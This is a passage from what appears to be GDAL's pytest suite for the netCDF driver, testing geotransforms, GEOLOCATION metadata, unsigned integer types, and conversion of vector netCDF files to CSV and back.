assert y_vals.startswith('{-87.15909455586265,-83.47893666931698,') and y_vals.endswith(',83.47893666931698,87.15909455586265}'), \
'got incorrect values in 1D geolocation'
###############################################################################
# test for correct geotransform of projected data in km units (bug #5118)
def test_netcdf_38():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/bug5118.nc'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ds = gdal.Open(ifile)
gdal.PopErrorHandler()
assert ds is not None, 'open failed'
gt = ds.GetGeoTransform()
assert gt is not None, 'got no GeoTransform'
gt_expected = (-1659.3478178136488, 13.545000861672793, 0.0, 2330.054725283668, 0.0, -13.54499744233631)
assert gt == gt_expected, \
('got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)))
###############################################################################
# Test VRT and the NETCDF:"filename":variable subdataset syntax
def test_netcdf_39():
if gdaltest.netcdf_drv is None:
pytest.skip()
shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
src_ds = gdal.Open('NETCDF:tmp/two_vars_scale_offset.nc:z')
out_ds = gdal.GetDriverByName('VRT').CreateCopy('tmp/netcdf_39.vrt', src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/two_vars_scale_offset.nc')
gdal.Unlink('tmp/netcdf_39.vrt')
assert cs == 65463
shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
src_ds = gdal.Open('NETCDF:"tmp/two_vars_scale_offset.nc":z')
out_ds = gdal.GetDriverByName('VRT').CreateCopy('tmp/netcdf_39.vrt', src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/two_vars_scale_offset.nc')
gdal.Unlink('tmp/netcdf_39.vrt')
assert cs == 65463
shutil.copy('data/two_vars_scale_offset.nc', 'tmp')
src_ds = gdal.Open('NETCDF:"%s/tmp/two_vars_scale_offset.nc":z' % os.getcwd())
out_ds = gdal.GetDriverByName('VRT').CreateCopy('%s/tmp/netcdf_39.vrt' % os.getcwd(), src_ds)
out_ds = None
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/two_vars_scale_offset.nc')
gdal.Unlink('tmp/netcdf_39.vrt')
assert cs == 65463
src_ds = gdal.Open('NETCDF:"%s/data/two_vars_scale_offset.nc":z' % os.getcwd())
out_ds = gdal.GetDriverByName('VRT').CreateCopy('tmp/netcdf_39.vrt', src_ds)
del out_ds
src_ds = None
ds = gdal.Open('tmp/netcdf_39.vrt')
cs = ds.GetRasterBand(1).Checksum()
ds = None
gdal.Unlink('tmp/netcdf_39.vrt')
assert cs == 65463
###############################################################################
# Check support for reading chunked bottom-up files.
def test_netcdf_40():
if gdaltest.netcdf_drv is None or not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
return netcdf_test_copy('data/bug5291.nc', 0, None, 'tmp/netcdf_40.nc')
###############################################################################
# Test support for georeferenced file without CF convention
def test_netcdf_41():
if gdaltest.netcdf_drv is None:
pytest.skip()
with gdaltest.error_handler():
ds = gdal.Open('data/byte_no_cf.nc')
assert ds.GetGeoTransform() == (440720, 60, 0, 3751320, 0, -60)
assert ds.GetProjectionRef().find('26711') >= 0, ds.GetGeoTransform()
###############################################################################
# Test writing & reading GEOLOCATION array
def test_netcdf_42():
if gdaltest.netcdf_drv is None:
pytest.skip()
src_ds = gdal.GetDriverByName('MEM').Create('', 60, 39, 1)
src_ds.SetMetadata([
'LINE_OFFSET=0',
'LINE_STEP=1',
'PIXEL_OFFSET=0',
'PIXEL_STEP=1',
'SRS=GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9108"]],AXIS["Lat",NORTH],AXIS["Long",EAST],AUTHORITY["EPSG","4326"]]',
'X_BAND=1',
'X_DATASET=../gcore/data/sstgeo.tif',
'Y_BAND=2',
'Y_DATASET=../gcore/data/sstgeo.tif'], 'GEOLOCATION')
sr = osr.SpatialReference()
sr.ImportFromEPSG(32631)
src_ds.SetProjection(sr.ExportToWkt())
gdaltest.netcdf_drv.CreateCopy('tmp/netcdf_42.nc', src_ds)
ds = gdal.Open('tmp/netcdf_42.nc')
assert (ds.GetMetadata('GEOLOCATION') == {
'LINE_OFFSET': '0',
'X_DATASET': 'NETCDF:"tmp/netcdf_42.nc":lon',
'PIXEL_STEP': '1',
'SRS': 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST],AUTHORITY["EPSG","4326"]]',
'PIXEL_OFFSET': '0',
'X_BAND': '1',
'LINE_STEP': '1',
'Y_DATASET': 'NETCDF:"tmp/netcdf_42.nc":lat',
'Y_BAND': '1'})
ds = gdal.Open('NETCDF:"tmp/netcdf_42.nc":lon')
assert ds.GetRasterBand(1).Checksum() == 36043
ds = gdal.Open('NETCDF:"tmp/netcdf_42.nc":lat')
assert ds.GetRasterBand(1).Checksum() == 33501
###############################################################################
# Test reading a GEOLOCATION array derived from the geotransform (non-default)
def test_netcdf_43():
if gdaltest.netcdf_drv is None:
pytest.skip()
src_ds = gdal.Open('data/byte.tif')
gdaltest.netcdf_drv.CreateCopy('tmp/netcdf_43.nc', src_ds, options=['WRITE_LONLAT=YES'])
ds = gdal.Open('tmp/netcdf_43.nc')
assert (ds.GetMetadata('GEOLOCATION') == {
'LINE_OFFSET': '0',
'X_DATASET': 'NETCDF:"tmp/netcdf_43.nc":lon',
'PIXEL_STEP': '1',
'SRS': 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST],AUTHORITY["EPSG","4326"]]',
'PIXEL_OFFSET': '0',
'X_BAND': '1',
'LINE_STEP': '1',
'Y_DATASET': 'NETCDF:"tmp/netcdf_43.nc":lat',
'Y_BAND': '1'})
tmp_ds = gdal.Warp('', 'tmp/netcdf_43.nc', options = '-f MEM -geoloc')
gt = tmp_ds.GetGeoTransform()
assert gt[0] == pytest.approx(-117.3, abs=1), gt
assert gt[3] == pytest.approx(33.9, abs=1), gt
###############################################################################
# Test NC_USHORT/UINT read/write - netcdf-4 only (#6337)
def test_netcdf_44():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
for f, md5 in ('data/ushort.nc', 18), ('data/uint.nc', 10):
netcdf_test_copy(f, 1, md5, 'tmp/netcdf_44.nc', ['FORMAT=NC4'])
###############################################################################
# Test reading a vector NetCDF 3 file
def test_netcdf_45():
if gdaltest.netcdf_drv is None:
pytest.skip()
# Test that a vector cannot be opened in raster-only mode
ds = gdal.OpenEx('data/test_ogr_nc3.nc', gdal.OF_RASTER)
assert ds is None
# Test that a raster cannot be opened in vector-only mode
ds = gdal.OpenEx('data/cf-bug636.nc', gdal.OF_VECTOR)
assert ds is None
ds = gdal.OpenEx('data/test_ogr_nc3.nc', gdal.OF_VECTOR)
with gdaltest.error_handler():
gdal.VectorTranslate('/vsimem/netcdf_45.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_45.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string1char,string3chars,twodimstringchar,date,datetime_explicit_fillValue,datetime,int64var,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,x,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,1234567890123,1,1,1.2,1.2,123,12,5,-125
"POINT (1 2)",,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,
"""
assert content == expected_content
fp = gdal.VSIFOpenL('/vsimem/netcdf_45.csvt', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(1),String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_45.csv')
gdal.Unlink('/vsimem/netcdf_45.csvt')
gdal.Unlink('/vsimem/netcdf_45.prj')
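# Minimal sketch (illustrative only, not exercised by the tests) of reading a
# netCDF vector layer through the OGR side of the API; the file and field names
# are hypothetical and the helper is not collected by pytest.
def _netcdf_vector_read_example(filename='example_vector.nc', field='int32'):
    ds = gdal.OpenEx(filename, gdal.OF_VECTOR)
    if ds is None:
        return []
    lyr = ds.GetLayer(0)
    values = []
    f = lyr.GetNextFeature()
    while f is not None:
        values.append(f.GetField(field))
        f = lyr.GetNextFeature()
    return values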
###############################################################################
# Test reading a vector NetCDF 3 file with test_ogrsf
def test_netcdf_46():
if gdaltest.netcdf_drv is None:
pytest.skip()
if test_cli_utilities.get_test_ogrsf_path() is None:
pytest.skip()
ret = gdaltest.runexternal(test_cli_utilities.get_test_ogrsf_path() + ' -ro data/test_ogr_nc3.nc')
assert ret.find('INFO') != -1 and ret.find('ERROR') == -1
###############################################################################
# Test reading a vector NetCDF 4 file
def test_netcdf_47():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
# Test that a vector cannot be opened in raster-only mode
with gdaltest.error_handler():
ds = gdal.OpenEx('data/test_ogr_nc4.nc', gdal.OF_RASTER)
assert ds is None
ds = gdal.OpenEx('data/test_ogr_nc4.nc', gdal.OF_VECTOR)
with gdaltest.error_handler():
gdal.VectorTranslate('/vsimem/netcdf_47.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_47.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string3chars,twodimstringchar,date,datetime,datetime_explicit_fillValue,int64,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field,ubyte_field,ubyte_field_explicit_fillValue,ushort_field,ushort_field_explicit_fillValue,uint_field,uint_field_explicit_fillValue,uint64_field,uint64_field_explicit_fillValue
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,,1,1,1.2,1.2,123,12,5,-125,254,255,65534,65535,4000000000,4294967295,1234567890123,
"POINT (1 2)",,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,
"""
assert content == expected_content
fp = gdal.VSIFOpenL('/vsimem/netcdf_47.csvt', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer,Integer,Integer,Integer,Integer,Integer64,Integer64,Real,Real
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_47.csv')
gdal.Unlink('/vsimem/netcdf_47.csvt')
gdal.Unlink('/vsimem/netcdf_47.prj')
###############################################################################
# Test reading a vector NetCDF 3 file without any geometry
def test_netcdf_48():
if gdaltest.netcdf_drv is None:
pytest.skip()
with gdaltest.error_handler():
ds = gdal.OpenEx('data/test_ogr_no_xyz_var.nc', gdal.OF_VECTOR)
lyr = ds.GetLayer(0)
assert lyr.GetGeomType() == ogr.wkbNone
f = lyr.GetNextFeature()
assert f['int32'] == 1
###############################################################################
# Test reading a vector NetCDF 3 file with X,Y,Z vars as float
def test_netcdf_49():
if gdaltest.netcdf_drv is None:
pytest.skip()
with gdaltest.error_handler():
ds = gdal.OpenEx('data/test_ogr_xyz_float.nc', gdal.OF_VECTOR)
gdal.VectorTranslate('/vsimem/netcdf_49.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_49.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32
"POINT Z (1 2 3)",1
"POINT (1 2)",
,,
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_49.csv')
###############################################################################
# Test creating a vector NetCDF 3 file with WKT geometry field
def test_netcdf_50():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.OpenEx('../ogr/data/poly.shp', gdal.OF_VECTOR)
out_ds = gdal.VectorTranslate('tmp/netcdf_50.nc', ds, format='netCDF', layerCreationOptions=['WKT_DEFAULT_WIDTH=1'], datasetCreationOptions=['GEOMETRY_ENCODING=WKT'])
src_lyr = ds.GetLayer(0)
src_lyr.ResetReading()
out_lyr = out_ds.GetLayer(0)
out_lyr.ResetReading()
src_f = src_lyr.GetNextFeature()
out_f = out_lyr.GetNextFeature()
src_f.SetFID(-1)
out_f.SetFID(-1)
src_json = src_f.ExportToJson()
out_json = out_f.ExportToJson()
assert src_json == out_json
out_ds = None
out_ds = gdal.OpenEx('tmp/netcdf_50.nc', gdal.OF_VECTOR)
out_lyr = out_ds.GetLayer(0)
srs = out_lyr.GetSpatialRef().ExportToWkt()
assert 'PROJCS["OSGB 1936' in srs
out_f = out_lyr.GetNextFeature()
out_f.SetFID(-1)
out_json = out_f.ExportToJson()
assert src_json == out_json
out_ds = None
gdal.Unlink('tmp/netcdf_50.nc')
###############################################################################
# Test creating a vector NetCDF 3 file with X,Y,Z fields
def test_netcdf_51():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.OpenEx('data/test_ogr_nc3.nc', gdal.OF_VECTOR)
# Test autogrow of string fields
gdal.VectorTranslate('tmp/netcdf_51.nc', ds, format='netCDF', layerCreationOptions=['STRING_DEFAULT_WIDTH=1'], datasetCreationOptions=['GEOMETRY_ENCODING=WKT'])
with gdaltest.error_handler():
ds = gdal.OpenEx('tmp/netcdf_51.nc', gdal.OF_VECTOR)
gdal.VectorTranslate('/vsimem/netcdf_51.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'], datasetCreationOptions=['GEOMETRY_ENCODING=WKT'])
ds = None
fp = gdal.VSIFOpenL('/vsimem/netcdf_51.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string1char,string3chars,twodimstringchar,date,datetime_explicit_fillValue,datetime,int64var,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,x,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,1234567890123,1,1,1.2,1.2,123,12,5,-125
"POINT Z (1 2 0)",,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,
"""
assert content == expected_content
fp = gdal.VSIFOpenL('/vsimem/netcdf_51.csvt', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(1),String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer
"""
assert content == expected_content
ds = gdal.OpenEx('tmp/netcdf_51.nc', gdal.OF_VECTOR | gdal.OF_UPDATE)
lyr = ds.GetLayer(0)
lyr.CreateField(ogr.FieldDefn('extra', ogr.OFTInteger))
lyr.CreateField(ogr.FieldDefn('extra_str', ogr.OFTString))
f = lyr.GetNextFeature()
assert f is not None
f['extra'] = 5
f['extra_str'] = 'foobar'
assert lyr.CreateFeature(f) == 0
ds = None
ds = gdal.OpenEx('tmp/netcdf_51.nc', gdal.OF_VECTOR)
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
assert f['int32'] == 1 and f['extra'] == 5 and f['extra_str'] == 'foobar'
f = None
ds = None
import netcdf_cf
netcdf_cf.netcdf_cf_setup()
if gdaltest.netcdf_cf_method is not None:
netcdf_cf.netcdf_cf_check_file('tmp/netcdf_51.nc', 'auto', False)
gdal.Unlink('tmp/netcdf_51.nc')
gdal.Unlink('tmp/netcdf_51.csv')
gdal.Unlink('tmp/netcdf_51.csvt')
gdal.Unlink('/vsimem/netcdf_51.csv')
gdal.Unlink('/vsimem/netcdf_51.csvt')
gdal.Unlink('/vsimem/netcdf_51.prj')
###############################################################################
# Test creating a vector NetCDF 3 file with X,Y,Z fields with WRITE_GDAL_TAGS=NO
def test_netcdf_51_no_gdal_tags():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.OpenEx('data/test_ogr_nc3.nc', gdal.OF_VECTOR)
gdal.VectorTranslate('tmp/netcdf_51_no_gdal_tags.nc', ds, format='netCDF', datasetCreationOptions=['WRITE_GDAL_TAGS=NO', 'GEOMETRY_ENCODING=WKT'])
with gdaltest.error_handler():
ds = gdal.OpenEx('tmp/netcdf_51_no_gdal_tags.nc', gdal.OF_VECTOR)
gdal.VectorTranslate('/vsimem/netcdf_51_no_gdal_tags.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
ds = None
fp = gdal.VSIFOpenL('/vsimem/netcdf_51_no_gdal_tags.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string1char,string3chars,twodimstringchar,date,datetime_explicit_fillValue,datetime,int64var,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x1,byte_field
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,x,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,1234567890123,1,1,1.2,1.2,123,12,5,-125
"POINT Z (1 2 0)",,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,
"""
assert content == expected_content
fp = gdal.VSIFOpenL('/vsimem/netcdf_51_no_gdal_tags.csvt', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(1),String(3),String(10),Date,DateTime,DateTime,Real,Real,Integer,Integer,Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer
"""
assert content == expected_content
gdal.Unlink('tmp/netcdf_51_no_gdal_tags.nc')
gdal.Unlink('tmp/netcdf_51_no_gdal_tags.csv')
gdal.Unlink('tmp/netcdf_51_no_gdal_tags.csvt')
gdal.Unlink('/vsimem/netcdf_51_no_gdal_tags.csv')
gdal.Unlink('/vsimem/netcdf_51_no_gdal_tags.csvt')
gdal.Unlink('/vsimem/netcdf_51_no_gdal_tags.prj')
###############################################################################
# Test creating a vector NetCDF 4 file with X,Y,Z fields
def test_netcdf_52():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
if gdaltest.netcdf_drv_version in ('4.6.3', '4.7.0'):
pytest.skip('buggy netCDF version: https://github.com/Unidata/netcdf-c/pull/1442')
ds = gdal.OpenEx('data/test_ogr_nc4.nc', gdal.OF_VECTOR)
gdal.VectorTranslate('tmp/netcdf_52.nc', ds, format='netCDF', datasetCreationOptions=['FORMAT=NC4', 'GEOMETRY_ENCODING=WKT'])
with gdaltest.error_handler():
ds = gdal.OpenEx('tmp/netcdf_52.nc', gdal.OF_VECTOR)
gdal.VectorTranslate('/vsimem/netcdf_52.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
ds = None
fp = gdal.VSIFOpenL('/vsimem/netcdf_52.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string3chars,twodimstringchar,date,datetime,datetime_explicit_fillValue,int64,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field,ubyte_field,ubyte_field_explicit_fillValue,ushort_field,ushort_field_explicit_fillValue,uint_field,uint_field_explicit_fillValue,uint64_field,uint64_field_explicit_fillValue
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,,1,1,1.2,1.2,123,12,5,-125,254,255,65534,65535,4000000000,4294967295,1234567890123,
"POINT Z (1 2 0)",,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,
"""
assert content == expected_content
fp = gdal.VSIFOpenL('/vsimem/netcdf_52.csvt', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,Integer,Integer,Real,Real,String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer,Integer,Integer,Integer,Integer,Integer64,Integer64,Real,Real
"""
assert content == expected_content
ds = gdal.OpenEx('tmp/netcdf_52.nc', gdal.OF_VECTOR | gdal.OF_UPDATE)
lyr = ds.GetLayer(0)
lyr.CreateField(ogr.FieldDefn('extra', ogr.OFTInteger))
f = lyr.GetNextFeature()
assert f is not None
f['extra'] = 5
assert lyr.CreateFeature(f) == 0
ds = None
ds = gdal.OpenEx('tmp/netcdf_52.nc', gdal.OF_VECTOR)
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
assert f['int32'] == 1 and f['extra'] == 5
f = None
ds = None
import netcdf_cf
netcdf_cf.netcdf_cf_setup()
if gdaltest.netcdf_cf_method is not None:
netcdf_cf.netcdf_cf_check_file('tmp/netcdf_52.nc', 'auto', False)
gdal.Unlink('tmp/netcdf_52.nc')
gdal.Unlink('tmp/netcdf_52.csv')
gdal.Unlink('tmp/netcdf_52.csvt')
gdal.Unlink('/vsimem/netcdf_52.csv')
gdal.Unlink('/vsimem/netcdf_52.csvt')
gdal.Unlink('/vsimem/netcdf_52.prj')
###############################################################################
# Test creating a vector NetCDF 4 file with WKT geometry field
def test_netcdf_53():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = gdal.OpenEx('../ogr/data/poly.shp', gdal.OF_VECTOR)
out_ds = gdal.VectorTranslate('tmp/netcdf_53.nc', ds, format='netCDF', datasetCreationOptions=['FORMAT=NC4', 'GEOMETRY_ENCODING=WKT'])
src_lyr = ds.GetLayer(0)
src_lyr.ResetReading()
out_lyr = out_ds.GetLayer(0)
out_lyr.ResetReading()
src_f = src_lyr.GetNextFeature()
out_f = out_lyr.GetNextFeature()
src_f.SetFID(-1)
out_f.SetFID(-1)
src_json = src_f.ExportToJson()
out_json = out_f.ExportToJson()
assert src_json == out_json
out_ds = None
out_ds = gdal.OpenEx('tmp/netcdf_53.nc', gdal.OF_VECTOR)
out_lyr = out_ds.GetLayer(0)
srs = out_lyr.GetSpatialRef().ExportToWkt()
assert 'PROJCS["OSGB 1936' in srs
out_f = out_lyr.GetNextFeature()
out_f.SetFID(-1)
out_json = out_f.ExportToJson()
assert src_json == out_json
out_ds = None
gdal.Unlink('tmp/netcdf_53.nc')
###############################################################################
# Test appending to a vector NetCDF 4 file with unusual types (ubyte, ushort...)
def test_netcdf_54():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
if gdaltest.netcdf_drv_version in ('4.6.3', '4.7.0'):
pytest.skip('buggy netCDF version: https://github.com/Unidata/netcdf-c/pull/1442')
shutil.copy('data/test_ogr_nc4.nc', 'tmp/netcdf_54.nc')
ds = gdal.OpenEx('tmp/netcdf_54.nc', gdal.OF_VECTOR | gdal.OF_UPDATE)
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
assert f is not None
f['int32'] += 1
f.SetFID(-1)
f.ExportToJson()
src_json = f.ExportToJson()
assert lyr.CreateFeature(f) == 0
ds = None
ds = gdal.OpenEx('tmp/netcdf_54.nc', gdal.OF_VECTOR)
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
f.SetFID(-1)
out_json = f.ExportToJson()
f = None
ds = None
gdal.Unlink('tmp/netcdf_54.nc')
assert src_json == out_json
###############################################################################
# Test auto-grow of bidimensional char variables in a vector NetCDF 4 file
def test_netcdf_55():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
shutil.copy('data/test_ogr_nc4.nc', 'tmp/netcdf_55.nc')
ds = gdal.OpenEx('tmp/netcdf_55.nc', gdal.OF_VECTOR | gdal.OF_UPDATE)
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
assert f is not None
f['twodimstringchar'] = 'abcd'
f.SetFID(-1)
f.ExportToJson()
src_json = f.ExportToJson()
assert lyr.CreateFeature(f) == 0
ds = None
ds = gdal.OpenEx('tmp/netcdf_55.nc', gdal.OF_VECTOR)
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
f.SetFID(-1)
out_json = f.ExportToJson()
f = None
ds = None
gdal.Unlink('tmp/netcdf_55.nc')
assert src_json == out_json
###############################################################################
# Test truncation of bidimensional char variables and WKT in a vector NetCDF 3 file
def test_netcdf_56():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_56.nc', options=['GEOMETRY_ENCODING=WKT'])
# Test auto-grow of WKT field
lyr = ds.CreateLayer('netcdf_56', options=['AUTOGROW_STRINGS=NO', 'STRING_DEFAULT_WIDTH=5', 'WKT_DEFAULT_WIDTH=5'])
lyr.CreateField(ogr.FieldDefn('txt'))
f = ogr.Feature(lyr.GetLayerDefn())
f['txt'] = '0123456789'
f.SetGeometry(ogr.CreateGeometryFromWkt('POINT (1 2)'))
with gdaltest.error_handler():
ret = lyr.CreateFeature(f)
assert ret == 0
ds = None
ds = gdal.OpenEx('tmp/netcdf_56.nc', gdal.OF_VECTOR)
lyr = ds.GetLayer(0)
f = lyr.GetFeature(lyr.GetFeatureCount())
if f['txt'] != '01234' or f.GetGeometryRef() is not None:
f.DumpReadable()
pytest.fail()
ds = None
gdal.Unlink('tmp/netcdf_56.nc')
###############################################################################
# Test one layer per file creation
def test_netcdf_57():
if gdaltest.netcdf_drv is None:
pytest.skip()
try:
shutil.rmtree('tmp/netcdf_57')
except OSError:
pass
with gdaltest.error_handler():
ds = ogr.GetDriverByName('netCDF').CreateDataSource('/not_existing_dir/invalid_subdir', options=['MULTIPLE_LAYERS=SEPARATE_FILES', 'GEOMETRY_ENCODING=WKT'])
assert ds is None
open('tmp/netcdf_57', 'wb').close()
with gdaltest.error_handler():
ds = ogr.GetDriverByName('netCDF').CreateDataSource('/not_existing_dir/invalid_subdir', options=['MULTIPLE_LAYERS=SEPARATE_FILES', 'GEOMETRY_ENCODING=WKT'])
assert ds is None
os.unlink('tmp/netcdf_57')
ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_57', options=['MULTIPLE_LAYERS=SEPARATE_FILES', 'GEOMETRY_ENCODING=WKT'])
for ilayer in range(2):
lyr = ds.CreateLayer('lyr%d' % ilayer)
lyr.CreateField(ogr.FieldDefn('lyr_id', ogr.OFTInteger))
f = ogr.Feature(lyr.GetLayerDefn())
f['lyr_id'] = ilayer
lyr.CreateFeature(f)
ds = None
